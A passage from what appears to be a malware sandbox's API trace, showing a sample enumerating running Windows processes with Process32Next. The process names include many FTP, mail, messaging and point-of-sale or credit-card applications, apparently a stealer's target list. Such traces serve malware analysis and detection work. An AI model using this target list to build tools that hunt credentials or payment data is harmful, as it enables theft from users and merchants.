lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.863] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.865] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.866] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.868] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.870] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.871] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.873] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.874] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.876] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0260.877] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.879] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0260.880] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.882] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0260.883] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0260.889] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0260.890] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0260.892] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0260.893] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0260.939] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.941] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.942] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0260.944] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.946] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.947] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.949] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0260.950] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0260.952] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0260.953] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0260.955] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0260.956] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0260.958] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0260.959] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0260.961] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0260.962] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0260.964] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0260.965] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0260.967] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0260.969] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0260.971] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0260.972] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0260.973] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0261.019] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0261.021] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0261.023] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0261.024] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0261.025] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0261.027] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0261.030] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0261.032] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0261.033] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0261.035] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0261.038] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0261.040] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0261.042] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0261.044] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0261.046] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0261.048] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0261.049] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0261.051] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0261.077] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0261.079] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0261.081] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0261.082] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0261.084] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0261.086] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0261.088] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0261.090] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0261.092] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0261.093] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0261.095] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0261.097] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0261.099] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0261.101] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0261.103] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0261.104] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0261.106] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0261.108] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0261.116] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0261.157] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0261.159] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0261.161] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0261.162] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0261.164] Process32Next (in: hSnapshot=0x2338, 